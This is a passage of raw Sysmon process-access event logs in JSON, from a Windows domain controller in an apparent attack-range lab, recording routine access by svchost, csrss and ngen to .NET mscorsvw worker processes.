C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.101","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2243-5F25-0000-0010F03E0C00}","TargetProcessId":"4500","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7161,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.163\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010AE330B00}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.163","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010AE330B00}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7162,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.163\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010AE330B00}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.163","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010AE330B00}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7163,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.163\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010AE330B00}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.163","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010AE330B00}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7164,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.195\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010A8360B00}\r\nTargetProcessId: 1676\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.195","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010A8360B00}","TargetProcessId":"1676","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7165,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.195\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-222F-5F25-0000-0010A8360B00}\r\nTargetProcessId: 1676\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.195","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-222F-5F25-0000-0010A8360B00}","TargetProcessId":"1676","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7166,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.210\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2243-5F25-0000-0010AD460C00}\r\nTargetProcessId: 1676\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.210","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2243-5F25-0000-0010AD460C00}","TargetProcessId":"1676","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7167,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.538\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2243-5F25-0000-0010734A0C00}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.538","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2243-5F25-0000-0010734A0C00}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\M